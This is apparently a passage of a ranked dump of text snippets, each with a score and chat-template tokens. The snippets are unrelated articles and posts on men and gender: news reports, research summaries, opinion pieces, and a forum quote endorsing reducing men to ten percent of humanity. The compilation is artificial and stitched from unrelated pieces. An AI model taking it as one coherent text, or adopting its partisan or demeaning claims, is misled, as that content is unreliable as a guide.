keeps morale in the lab way up. + +Tim Hunt also mentions that men and women are constantly falling in love with each other within the lab. This is true; I used to identify as homosexual before working with a group of bearded men and a set of phallic pipettes turned me straight. Once that happened, I couldn’t stop falling in love with every man I met. One time I fell +================================================================================ +Rank = 23; Score = 516096.0 +<|begin_of_text|>Feminism didn't kill men's rights advocate Earl Silverman Earl Silverman had his demons, and his pain must be taken seriously. But feminism isn't responsible for his death + +He was a hero of the Men's Rights movement. Three years ago, Earl Silverman, a self-described long-term survivor of violence at the hands of an abusive wife, turned his own home into the Men's Alternative Safe House, Canada's first domestic abuse shelter for men and their children. On Friday, he was found hanging in its garage, an apparent suicide. + +Silverman had been going through a period of intense personal stress lately – his death came just one day after he packed up his recently sold home. Just last month, he'd closed the shelter because he could no longer afford to maintain it. He had said he was struggling to keep up with his heat and grocery bills. + +Advertisement: + +In his dogged efforts to help men and to raise public awareness, Silverman worked to remove the stigma that can often prevent men from speaking out because of pride and fear and misunderstanding. Yet where Silverman came up short was in perpetuating the Men's Rights movement's fiction that there's any gender equity as far as violence and victims. The Calgary Herald recalled, in its coverage of his death, Silverman's oft-repeated insistence that "men are about as likely as women to say they have been the victims of domestic abuse." + +Despite the jokey, knee-jerk assumption that male abuse either isn't real or is only reserved for the henpecked and weak, there is no question that female abusers exist. There are male victims. Whether we're talking about violence or sexual abuse, we need to understand that, and to treat men who have been the victims of abuse with respect and compassion. + +Yet the truth isn't as tit-for-tat as Silverman made it out to be. The American Bar Association, for example, notes that the statistics bear out that "nearly 25 percent of women and 7.6 percent of men" have been raped and/or physically assaulted by a partner. Partner violence makes up roughly 20 percent of the violent crime against women, and 3 percent of it against men." These statistics don't distinguish partner gender. The ABA notes that "Most perpetrators of sexual violence are men" and that "Sexual violence against men is also mainly male violence." But tell that to Silverman's MRA fans, who are currently lamenting that he was a victim of "misandrist bullshit" and +================================================================================ +Rank = 24; Score = 516096.0 +<|begin_of_text|>Some psychologists argue that defining pedophilia as a criminal act or a mental disorder is not so black and white. A recent study conducted at the University of Windsor in Canada has found that pedophiles tend to be left-handed and often have superficial facial flaws, known as Minor Physical Anomalies (MPAs). Results show that certain aspects of neural development could affect a person’s risk for pedophilic tendencies. + +"Evidence is steadily accumulating to support a neurodevelopmental basis of pedophilia," lead researcher Fiona Dyshniku said in a statement. "If we find that pedophilia has a biological basis, with a very early, even prenatal onset, this will influence and hopefully improve methods of treatment for this group.” + +Dyshniku and her colleagues recruited 140 adult men referred to the Kurt Freund Laboratory of the Centre for Addiction and Mental Health in Toronto, who were evaluated for certain physical anomalies and right or left handedness. Each participant was assessed for their distressing or illegal sexual behavior using a forensic and medical file review, an interview regarding sexual history, and phallometric testing for erotic preference. + +Men from the study who researchers identified as pedophiles were more likely to have minor facial and head flaws compared to men who were not considered pedophiles. Men with facial and head deviations scored highest on indicators of pedophilia. These facial and head anomalies included non-detached earlobes, malformed ears, and a high or steepled palate. + +Facial malformations tend to develop due to the same primary embryonic tissue layer that forms the central nervous system during the first and second trimesters of pregnancy. These facial flaws, which are more prevalent among men, are usually caused by prenatal exposure to viruses, alcohol or drugs, obstetric complications, or nutritional deficiencies. + +"If we know more about the etiology of an injurious behavior, we can create more effective treatments and look toward prevention," added Rachel Fazio, clinical neuropsychologist and co-author of the study. "For years, it was thought that child molestation was somewhat of a learned behavior, potentially from the abusers having been sexually abused themselves as children. While this may be a factor in some cases, this is not the case in those with genuine pedophilia." + +Findings from the study also revealed that most pedophiles are left-handed, which is on par with similar studies in the past. Left- or right-handedness is decided very early in life and is a direct result of prenatal cognitive development. Between eight to 12 percent of the population +================================================================================ +Rank = 25; Score = 516096.0 +<|begin_of_text|>When men contribute less to their household's income, relative to their wives, they tend to become more polarized in their political views. (iStock) + +There's something about money and men. + +Researchers have long shown a link between men's identities and their income: Men tend to work more hours if faced with the threat of their wife earning as much as they do. When men make less money than their wives, they tend to do less housework, not more. And when men are out-earned in their marriages, they're even more likely to use erectile dysfunction medicine or show greater rates of depression. + +Now, a new study, currently under review by an academic journal but published last week by the Harvard Business Review, finds that when a man's contribution to his household's total income drops over time, it affects his political views, too. Republican men tend to grow more conservative, and guys who say they're Democrats become more liberal. + +[America’s manliest industries are all competing for women] + +To do the research, Dan Cassino wanted to look at the effect lower incomes have on men's political views, but knew that comparing men's relative income, marriages and politics is hard because of something known as “selection bias.” For example, it could simply be that different kinds of men marry women who earn more than them — in other words, there's no random application of people to spouses. + +So he looked at the General Social Survey, a panel study that asks the same individuals about demographic data and views on issues over time, pulling data on 854 men from 2006, 2008 and 2010. About 60 percent of those men saw their income drop relative to their spouses during one of those two-year periods, giving Cassino a look at how men's views evolved during a period when, thanks to the recession and financial crisis, men were disproportionately likely to lose their jobs or take pay cuts, compared with women, who have increasingly become the family breadwinners. + +“That's a huge opportunity to look at what happened to those men's individual attitudes,” he said. For men, in particular, income is tied to their gender identity and status. “The reason you're anxious about … less money is not just, 'oh, I have less money.' It's that my masculinity is being called into question by the fact that [I] make less money,” Cassino said. + +[Why the gender gap doomed Hillary Clinton] + +He pulled data on how the men's views changed on two issues: How much they +================================================================================ +Rank = 26; Score = 514048.0 +<|begin_of_text|>I know a number of men who seemed to make a point of marrying women who posed no threat of outshining their achievements—or even matching them. This viewpoint is no surprise in light of research by psychologists Kate Ratliff of the University of Florida and Shigehiro Oishi of the University of Virginia reported in a recent issue of the Journal of Personality and Social Psychology. In one experiment conducted with 32 male/female dating couples, the participants were given a test they were told measured their intelligence. The test was not graded, but each participant was informed that his or her partner scored in either the top 12% or bottom 12%. The men who had been told they had high-scoring partners measured lower on a self-esteem test than the men who thought their female partners scored low. + +Other studies have also shown that men often regard their female partners’ success as a reflection on them; if she succeeds more, it means he has failed. Women, on the other hand, are more likely to see the man’s success as good for the relationship overall.[/pullquote]In another experiment with 122 men and women who were involved in heterosexual relationships but weren’t couples, the males scored higher on a measure of self-esteem when recalling a time when their partner had failed at an intellectual or social endeavor. The result was quite different for women. “Unlike men, even when women were explicitly asked to think of [a] time when their partner succeeded and they themselves failed, their implicit self-esteem was not decreased,” stated the researchers. + +Other studies have also shown that men often regard their female partners’ success as a reflection on them; if she succeeds more, it means he has failed. Women, on the other hand, are more likely to see the man’s success as good for the relationship overall. They also tend to view their own success in terms of its value for the relationship, rather than just being about “me.” These differences in perspective are not surprising, considering traditional gender roles. “Because men and women have different social roles, different expectations for their close relationships, and different responses to competition, it is likely that men and women’s self-esteem is differentially impacted by a romantic partner’s success or failure,” Drs. Ratliff and Oishi wrote in their published report. + +One explanation for men’s reaction is that they fear their mate might seek out a more appealing man, according to Mark White, Ph.D., chair of the philosophy department at the College of Staten Island/CUNY. “[The man’s +================================================================================ +Rank = 27; Score = 509952.0 +<|begin_of_text|>For more than three decades evolutionary psychologists have advanced a simple theory of human sexuality: because men invest less reproductive effort in sperm than women do in eggs, men's and women's brains have been shaped differently by evolution. As a result, men are eager for sex whereas women are relatively choosy. But a steady stream of recent evidence suggests this paradigm could be in need of a makeover. + +"The science is now getting to a point where there is good data to question some of the assumptions of evolutionary psychology," says social psychologist Wendy Wood of the University of Southern California (U.S.C.). + +The eager males–choosy females paradigm doesn't imply that men and women literally make conscious decisions about how much effort they should put into short- and long-term mating relative to their costs of reproduction—minutes versus months. Instead the idea is that during human history, men and women who happened to have the right biochemical makeup to be easy and choosy, respectively, would leave more offspring than their counterparts. + +In 1993 psychologists David Buss and David Schmitt, then at the University of Michigan at Ann Arbor, used that idea to generate a series of predictions about men's and women's sexual behavior. As part of their study, Buss and Schmitt surveyed college students about their desire for short- and long-term mates (that is, one-night stands versus marriage partners), their ideal number of mates, how long they would have to know someone before being willing to have sex, and what standards a one-night stand would have to meet. In all categories the men opted for more sex than the women. + +Although the study has been cited some 1,200 times, according to Google Scholar, there were "huge gaps from what I'm used to as a scientist," says Lynn Carol Miller of U.S.C. Miller says that in order to evaluate the relative proportion of mating effort devoted to short- and long-term mating in the two sexes, the proper method is to use a scale such as time or money, which has the same interval between units, not the seven-point rating scale that Buss and Schmitt used. + +In a study to be published in the journal Sex Roles: A Journal of Research, Miller and her colleagues carried out their own version of Buss and Schmitt's work, asking how much time and money college students spent in a typical week pursuing short-, intermediate- or long-term relationships. The proportion of mating effort dedicated to short-term mating was the same for men and women. Similarly, both men and women showed an equivalent tendency to lower +================================================================================ +Rank = 28; Score = 509952.0 +<|begin_of_text|>Throw back your head and let out a long celebratory birthday howl for Nikai! Welcome to the terrific twos, kiddo! The Wolf Conservation Center‘s youngest Ambassador has been an inspiration from his adorable start. Within a month of joining the WCC family the little beast huffed, puffed, and hiccuped his way into the hearts and minds of a global audience. His viral video “Wolf Pup Hiccups” almost broke the internet! + +Today the stunning ambassador continues to awe and help open the door to understanding wolves by forging a connection between the public and his wild kin. Although he remains a “ladies man,” having yet to completely outgrow his uneasiness around men, his trepidation is natural and his behavior offers WCC guests a glimpse of how elusive wolves naturally are. + +Physically Nikai is no longer the baby of the family; he has become equal in stature to older siblings Alawa and Zephyr. He does, however, remain the “child” within the family hierarchy. Zephyr is the self-appointed leader of the family – expressing his status with erect posture and tail carried high. Most of the time Nikai exhibits his lower position through submissive/puppy-like behavior. With lowered tail and posture, he acknowledges his role and rank in the family order. He is often pawing, tucking his tail, and licking the muzzles of his siblings – some of the natural submissive gestures expressed by less dominant wolves. However, during the winter months Nikai did test Zephyr. He incessantly egged on his older brother until the two had it out while Alawa wisely steered clear of the mayhem. Thankfully it took only a few bumps and scratches to return peace and order to the pack with Zephyr at the helm once again. + +So a new chapter opens for our Ambassador trio. And what an honor to watch the family transition into such powerful players in the fight to preserve wolves’ rightful place in the environment. + +Help support the Wolf Conservation Center‘s efforts to protect and preserve wolf populations in North America by adopting the birthday boy! We offer several adoption levels. No matter what the level, each adoption kit includes an 8×10 wolf photo, wolf biography, adoption certificate and a subscription to our newsletter. Learn more. + +Happy Birthday, Nikai!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 29; Score = 503808.0 +<|begin_of_text|>While Led Zeppelin's "Stairway to Heaven" is a well-known template for rock music, very few have managed to follow it well. Three whole decades passed from its 1971 release and no one bested it, not even Guns N' Roses' "November Rain" or Journey's "Don't Stop Believing" or, uh, Live's "Lightning Crashes." It was only in the 2000s that rock bands got their shit together and produced several candidates that lived up to "Stairway." But like the Highlander, there can be only one. Friends, today we're going to discover which of these 00s alt-rock slammers is the millennial successor to this classic rock not-slammer (the live versions are the true gospel). + +Now, it's not like we're in an anthem-deficient time in music. The new lighter-wavers are just rap and trap and pop singles, which is great! But the nature of, say, "Black Beatles" is wholly different from a "Stairway" or its imitators, the likes of which we may never see again. These largely straight and white men made these songs because they wanted you to feel their very important feelings, dammit, and they were going to use all the tools in the arsenal of rock to do so. There's a pure, innocent beauty in that kind of obliviousness, and it's that magic we're trying to remember and tediously rank today. Seeing as how sports and competition are the basis of everything now, we're going to do this as a bracket tournament. + +So you may ask yourself, "what makes a song a 'Stairway'"? That's a great question, so let's define what a "Stairway" is. + +A "Stairway to Heaven" is... + +1. Almost always a rock song, typically a ballad + +2. Recognizable within the first few seconds + +3. Already emotional from the jump, but eventually reaches a point that has all living things weeping openly + +While there are definitely many giant, cathartic rock songs from the last decade, very few of them are actually known by regular people, and that ubiquity is what's really needed (i.e. "All My Friends" and other indie classics are not eligible). And yes, this will pool from songs released mainly in the last decade, as this gives the minimum amount of time for nostalgia to ferment into uncritical adoration. Cool? Cool. Let's +================================================================================ +Rank = 30; Score = 499712.0 +<|begin_of_text|>Joseph Dalesandro, 19, was ordered held on $50,000 bail Friday. View Full Caption DNAinfo; Chicago Police Department + +COOK COUNTY CRIMINAL COURTHOUSE — A UIC freshman with a four-year swimming scholarship has been charged with illegally filming female teammates as they changed clothes in their locker room. + +Joseph Dalesandro, 19, was ordered held on $50,000 bail Friday on allegations he filmed four women with an iPhone over the course of several hours Feb. 2. + +According to prosecutors, locker rooms for men and women on the UIC swimming and diving teams are separated by a partition wall that has a gap between the top of the wall and the ceiling for a smoke detector. + +Dalesandro is accused of perching his iPhone on the wall about 11 a.m. Feb. 2 and recording two women on the diving team, ages 19 and 20, as they changed clothes. + +Dalesandro filmed the women for three minutes, prosecutors said, but later cropped the video to feature one minute of nudity. + +About two hours later, Dalesandro filmed the women's locker room for 45 minutes — this time capturing two swimmers, ages 19 and 20, as they changed clothes, Assistant State's Attorney Joseph Carlson said during a bond hearing Friday. + +One of the women heard laughter coming from the men's locker room and looked up, expecting the men to throw something over the wall, prosecutors said. + +Instead, she spotted Dalesandro's phone, Carlson said. Two of the women retrieved the phone and brought it to their coach, who called campus police. + +During the course of their investigation, officers learned the phone was registered to Dalesandro and his mother, prosecutors said. Dalesandro was one of five men who had access to the locker room at the time of filming; his phone was also logged into the UIC wireless network with his username when the videos were made. + +Police on Thursday arrested Dalesandro, who lives on campus and comes from Naperville. He confessed to making the videos and "stated he knew what he had done was illegal," Carlson said. + +In court Friday, Assistant Public Defender Marc Davidson noted that the videos Dalesandro recorded were never disseminated, and that Dalesandro has no prior criminal history. + +"This was a prank," Davidson said. "A tasteless prank that went nowhere.... This will cost him dearly over the years." + +Davidson went on to say that Dalesandro is a UIC freshman with a four +================================================================================ +Rank = 31; Score = 497664.0 +<|begin_of_text|>Late Wednesday, Twitter released a report showing what's become a very familiar story in Silicon Valley: That its workforce is mostly white and mostly male. By the company's own admission, Twitter has "a lot of work to do." Seven out of 10 employees there are men. + +Meanwhile, nearly two-thirds of Twitter is staffed by whites. Asians are also dominant, accounting for 29 percent of employees. + +This matches a lot of what we've seen at other companies lately, from Google to Yahoo to Facebook to LinkedIn. The reports all speak clearly and transparently about the need to become more inclusive — not just when it comes to gender, but also to race. At Google, for instance, only 2 percent of employees are black and 3 percent Hispanic. + +There is a another story in the data that's less apparent, though, and it's about class. We don't typically talk about class as it relates to tech companies, because tech tends to be a lucrative field in its own right and engineers make a lot of money. If anything, tech employees have borne the brunt of the criticism in connection with San Francisco's skyrocketing housing prices, or the exclusive corporate shuttle buses that wind their way through the city during rush hour. + +Still, the data show that there's a big gap between the executives at the top of the pyramid and those who actually make the machines go. + +This is true for Twitter, but also at Yahoo, where women account for 37 percent of the workforce but only 23 percent of leadership positions. Whites make up only 50 percent of Yahoo's U.S. employees, but as much as 78 percent of its U.S.-based leadership. + +Asians make up more than a third of Facebook's overall workforce. Yet only 19 percent have made it into senior-level positions. + +There appears to be a ceiling at many of these companies that transcends demography — though it's important to point out that some groups in leadership do match their level of representation in the rest of the company. Blacks account for 2 percent of Twitter's employees, and they also account for 2 percent of Twitter's leadership. Hispanics account for 4 percent of leadership employees at Facebook, and also 4 percent of the company's overall workforce. + +Why should we care whether the top level leadership looks like the rest of the company? For the same reasons that people care about a company's diversity overall: Different experiences and value systems help counter groupthink. Homogeneity at the top conditions people to act in certain ways that might +================================================================================ +Rank = 32; Score = 489472.0 +<|begin_of_text|>This post has been corrected. + +All-male speaker lineups are so commonplace that there’s at least one Tumblr blog dedicated to mocking them (with a David Hasselhoff meme, no less). The endless stream of them can leave a thinking person overwhelmed and perhaps even convinced that they’re inevitable. + +If you find yourself in this camp, help is on the way. Enter mathematician Greg Martin, who has presented an ingenious statistical probability analysis that even amateurs like me can(well, mostly) understand. Working with a “conservative” assumption that 24% of PhDs in mathematics have been granted to women over the last 25 years, he finds that it’s overwhelmingly improbable that a speakers’ lineup including one woman and 19 men could be random. + +His explanation of the formula is a rollicking one involving marbles and a potentially suspicious roommate, and you which you can read here. The underrepresentation of women on speakers’ lists doesn’t “just happen,” despite many conference organizers’ claim that it does. + +If you do the math, as Martin has, the argument that speakers are chosen without bias simply doesn’t hold up. In fact, when using the formula to analyze the speakers’ list for a mathematics conference—which featured just one woman and 19 men—he found that it would be eighteen times as likely for women to be overrepresented on the speakers’ list than to be so underrepresented. + +The formula can just as easily be applied to other fields; all that’s needed is reliable data on the field’s gender distribution, which can usually be gathered by way of industry associations and/or government statistics (pdf). + +I spoke with Martin about his analysis, its implications and whether it might finally convince conference organizers to stop making excuses for their underrepresentation of women. + +What prompted you to calculate the statistical probability of all-male speakers’ lists? + +While I’d love to claim it was my idea originally, that’s not the case—I came across a Conference Diversity Distribution Calculator by Aanand Prasad on the web. Prasad further credits inspiration for the idea to comments by Dave Wilkinson and Paul Battley. + +As a side note, following Prasad’s links to those comments leads to two web pages—this one and this one—concerning tech conferences within the last three years that were criticized for inviting men almost exclusively; reading the rest of those comment threads reveals how truly dismissive and defensive people get when gender disparity is pointed out. Sadly, we still have a long way to go. + +If I understand your conclusion correctly, the odds +================================================================================ +Rank = 33; Score = 489472.0 +<|begin_of_text|>Inside the April issue of Vanity Fair, Jonah Hill, Seth Rogen, Jason Segel and Paul Rudd spoof a 2006 cover with Tom Ford, Keira Knightley and Scarlett Johansson. But with bodysuits. What a cop-out. + +Is it funny that the guys (and Annie Leibovitz, who shot both images) spoofed the shot? Sure. But it would have been funnier if the guys were actually naked. Who made this decision? Why bodysuits? It's understandable to try and create a "pale" skin tone for the purposes of recreating the original photograph properly, but Leibovitz is a whiz with lighting. Is the world not ready for Jonah Hill's ass? As for Jason Segel, he already did full-frontal nudity in Forgetting Sarah Marshall. We saw Seth Rogen's bare buttocks in Knocked Up. Why is it that naked woman can appear on the cover of Vanity Fair, yet none of these dudes can expose their bellies? Is it because they're not thin? + +Of course, this issue just reflects the problems with nudity in our society in general. When I went to see Friday The 13th, the theater was crowded with men and women, but after the third time a female actress was shown topless, some girl behind me yelled out, "How come we can't see no huevos?" She was asking for balls, but knew that the movie wouldn't show any, because the producers didn't have any. And that's the problem with this "spoof." As any good comedian knows, you have to commit to the joke. This one was done — ahem — half-assed.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 34; Score = 483328.0 +<|begin_of_text|>Thad McCotter knows the moral of our debt story. + +I’ve been wondering for a while now why the heck Rep. Thad McCotter is running for president. + +Yes, president of the United States. + +You may not have encountered the Michigan Republican as presidential candidate because he did not meet the 1 percent poll threshold for the Fox News debate in Iowa. But a few days later, at the Ames Straw Poll, there he was. + +Advertisement + +Advertisement + +At the Iowa State University stadium, what began as a professorial lecture gave way to a sharp wake-up call as McCotter brought up China: “We have to accept the reality that Communist China is a strategic threat and a rival model of governance to the United States.” The applause made clear that the audience had been called to attention. + +#ad#McCotter continued: “And the reason, as the party of Reagan and Lincoln, we understand, as a free people — we understand our liberty, which comes from our creator, is the foundation of our security and the foundation of our prosperity. The Communist Chinese regime in Beijing that butchered my generation in the streets of Tiananmen Square for quoting Jefferson and Madison believes that human liberty is a threat to state-provided security and prosperity. They are as wrong today as the Soviet Union was wrong in the 20th century, and I for one will not cede the 21st century to a Communist nuclear-armed dictatorship that tells you how many children you can have, that tells you if you can pass out Bibles, that tells you what Catholic Church you can attend, or tries to culturally commit genocide against the people of Tibet.” + +Advertisement + +China, of course, is home to the one-child policy, which turns 31 this September. The policy has manifested itself in a kind of brutality that we can’t watch on CNN but that is nonetheless both real and devastating. China will boast that it has prevented 400 million births since 1980; the program has been implemented through a culture of forced abortion, involuntary sterilization, infanticide, and other persecution. The World Health Organization tells us that China also has the highest female suicide rate in the world. “Could this high suicide rate be related to forced abortion?” asks Reggie Littlejohn, president of Women’s Rights without Frontiers. Many families make sure that their one child is a boy. China has reported as many as 37 million more men than women, making unhappy bachelorhood increasingly commonplace.“China’s One Child Policy causes more violence towards women and +================================================================================ +Rank = 35; Score = 483328.0 +<|begin_of_text|>All eyes were on Shayne Oliver as he stepped into a sweltering Bronx church in the heat of summer, 2000. The lanky teenager shuffled into the vestibule wearing a short white crop top, exposing his taut midriff. Blots of black skin poked through hand-tattered jeans that were so tight he had to cut them up and safety-pin them back together to get them on. Shayne's outfit set him drastically apart from the men of the congregation, who wore boxy suits. He and his mother hadn't even taken seats in a pew before the preacher started spewing a diatribe of venomous, homophobic remarks from the pulpit. It took a moment before Shayne realized the preacher was attacking him. "Basically, the pastor ran me out of the church," he told me recently. "I stopped going after that." + +Shayne's now 25 and the designer of menswear label Hood By Air, whose provocative styles—along with brands like Telfar and Third Floor—are carving out a new and empowering palette of masculinity for young black men to paint from. At Shayne's shows, it's not out of the ordinary to see his models stalk the runway in makeup and dresses. Their bellies are often exposed, and half the time you can't tell whether they're men or women. But far from sissiness, the looks exude the visceral power of a lineman crushing a quarterback, or two swords clashing in an action film. This time last year, at Shayne's debut New York Fashion Week runway show, the scene was so thick I had to stand on my tiptoes to catch a glimpse of his powerful vision of androgynous modern menswear. With macho gangster rapper A$AP Rocky on the catwalk, and stars like Kanye West and Waka Flocka Flame in the crowd offering up their adulation, the show was the birth of a new epoch in the evolution of black masculinity. + +There have been others who've pushed similar boundaries in the past. Before Kanye and A$AP, black artists like Sly and the Family Stone in the 60s and Cameo in the 80s wore gear that looked like it was straight out of the Folsom Street Fair. In the 90s, Tupac walked in a Versace fashion show in a flamboyant gold suit. + +But one of the things that sets this new wave apart from what came before is that straight men like Kanye and Rocky have no problem recognizing +================================================================================ +Rank = 36; Score = 479232.0 +<|begin_of_text|>The combat code of the US Military is that we don’t abandon our dead or wounded on the battlefield. In US Air Force lingo, fighter pilots don’t run off and leave their wingmen. If one of our own is shot down, still alive and not yet in enemy captivity, we will either come to get him or die trying. Among America’s fighting forces, the calm, sure knowledge that such an irrevocable bond exists is priceless. Along with individual faith and personal grit, it is a sacred trust that has often sustained hope in the face of terribly long odds. + +The disgraceful abandonment of our Ambassador and those brave ex-SEALs who fought to their deaths to save others in that compound is nothing short of dereliction-of-duty. Additionally, the patently absurd cover-up scenario that was fabricated in the aftermath was an outright lie in attempt to shield the President and the Secretary of State from responsibility. + +It has been over eight months since the attack on our compound in Benghazi. The White House strategy, with the aid of a “lap dog press” has been to run out the clock before the truth is forthcoming. The recent testimonies of the three “whistle blowers” have reopened the subject and hopefully will lead to exposure and disgrace of those responsible for this embarrassing debacle. + +It would appear that the most recent firewall which the Administration is counting on is the contention that there were simply no military assets that could be brought to bear in time to make a difference… mainly due to the unavailability of tanker support for fighter aircraft. This is simply BS, regardless how many supposed “experts” the Administration trot out to make such an assertion. The bottom line is that even if the closest asset capable of response was half-way around the world, you don’t just sit on your penguin *** and do nothing. The fact is that the closest asset was not half-way around the world, but as near as Aviano Air Base, Italy where two squadrons of F-16Cs are based. + +Consider the following scenario (all times Benghazi local): + +When Hicks in Tripoli receives a call at 9:40 PM from Ambassador Stevens informing him “Greg, we are under attack!” (his last words), he immediately notifies all agencies and prepares for the immediate initiation of an existing “Emergency Response Plan.” At AFRICON, General Carter Ham attempts to mount a rescue effort, but is told to “stand down.” By 10:30 PM an unarmed drone is overhead the compound and streaming live feed to various Command +================================================================================ +Rank = 37; Score = 475136.0 +<|begin_of_text|>Women are discriminated against in all areas of gaming. What can we do about it? + +WARNING: this article involves feminism. Those offended by the idea of gender equality should STEP AWAY FROM THEIR COMPUTERS NOW and get back inside their caves. Not a misogynist? Then hey buddy, sit back and relax. I’d offer you a cup of tea but you’re miles away (and I don’t have any tea). + +Sexism permeates our society, that’s a given, but you might not have realised just how much it occurs in gaming. There are three levels at which it exists: at an industry level, in games themselves, and from within gamers. It’s vital that we are aware of these problems but, more importantly, we have to do our best in tackling them. To do this, we must look at each problem in turn. + +First: sexism in the industry. There is evidence that suggests women who work in gaming are under-represented and suffer some of the worst gender-based harassment. Female gamers make up 45% of the gaming population; yet male game designers make up 89% of the industry and earn 23.6% more than their female counterparts. What a kick in the balls vagina. There have also been many high-profile incidents of women being harassed by men in the workplace. One of the most recent stories involved Josh Mattingly, CEO and founder of Indiestatik, publicly apologising and “stepping down” after sending a female game developer inappropriate and unprovoked sexual messages on Facebook. + +People have claimed that women should just stand up for themselves and that speaking up against those that harass them should be enough to stop the problem, but there is not always a clear cut solution. The #thatwoman hashtag shows that in speaking up, women are likely to be ostracised and have it limit their future career. Perhaps the risk would be worth the overall benefits, but it is understandable why women in gaming don’t always feel free to confront those that may oppress or belittle them. It would be like Yoshi trying to stand up to Mario – he’s just going to drop Yoshi mid-jump and carry on like nothing happened anyway. + +Similarly, the #1reasonwhy hashtag asked women to speak out about why they don’t feel comfortable in the gaming industry. The results included stories of groping and being constantly mistaken for assistants and receptionists. + +Jade Raymond, Producer of Assassin’s Creed, was accused of using her looks to sell the game + +What is there to be done about +================================================================================ +Rank = 38; Score = 473088.0 +<|begin_of_text|>ST. CHARLES, Mo. – One day after Rep. Todd Akin vowed to stay in the race for US Senate, dismissing calls from across the Republican party to step aside, Sen. Claire McCaskill welcomed Akin back to the campaign by bashing him for abandoning veterans during his years in Congress. + +Visiting two VFW halls near St. Louis on Wednesday, McCaskill, the Democrat Akin is hoping to unseat here in Missouri, went through a list of Akin votes that took more than two minutes to recite. + +Audiences were mostly male and senior citizen. Survivors of combat in Vietnam – and at least one World War II veteran – looked on beneath baseball caps decorated with military insignia as she accused Akin of blocking bonuses for troops stationed in Iraq and Afghanistan and voting against health care benefits for reservists and national guard members. + +“So that’s kind of the list,” McCaskill said of Akin’s voting record. “Now, I don’t have a list like that." + +The attack did not include any mention of the recent controversy embroiling Akin. + +Sunday, Akin told a television interviewer that women could biologically prevent pregnancies resulting from what he called “legitimate rape.” + +The remarks set off a firestorm, but Wednesday McCaskill only alluded to them broadly. + +During a press conference outside a VFW home in nearby Overland, McCaskill brushed aside questions about Akin’s future. + +“The voters have spoken, and he’s the nominee,” McCaskill said. + +“We’re going to draw the contrasts that I think are necessary so that voters know that he’s outside the mainstream, he’s very extreme,” she added later. + +Tuesday, Akin let a deadline for withdrawing from the Senate race pass. + +Rep. Todd Akin, R-Mo., confirms with TODAY's Matt Lauer that vice presidential candidate and fellow congressman Paul Ryan advised him to step down amid the fallout of comments he made about rape and abortion. + +He told NBC’s Matt Lauer during a Wednesday interview on the TODAY show that his nomination was a “decision made by the citizens of our state, not the party bosses.” + +McCaskill’s VFW visits were part of a so-called “Vets for Claire” listening tour that the campaign says was arranged prior to the Akin controversy. + +A VFW official in Overland asked reporters to hold McCaskill’s press conference outside the building, in order to keep the organization compliant with rules prohibiting political activity by 501(c)(3) charity groups +================================================================================ +Rank = 39; Score = 473088.0 +<|begin_of_text|>Skip to comments. + +Humanity Should be 10% Male 90% Female (BC Prof Mary Daly) + +Posted on by beckett + +What Is Enlightenment (Susan Bridle): Which brings us to another question I wanted to ask you. Sally Miller Gearhart, in her article "The Future If There Is One Is Female" writes: "At least three further requirements supplement the strategies of environmentalists if we were to create and preserve a less violent world. 1) Every culture must begin to affirm the female future. 2) Species responsibility must be returned to women in every culture. 3) The proportion of men must be reduced to and maintained at approximately ten percent of the human race." What do you think about this statement? + +Mary Daly: I think it's not a bad 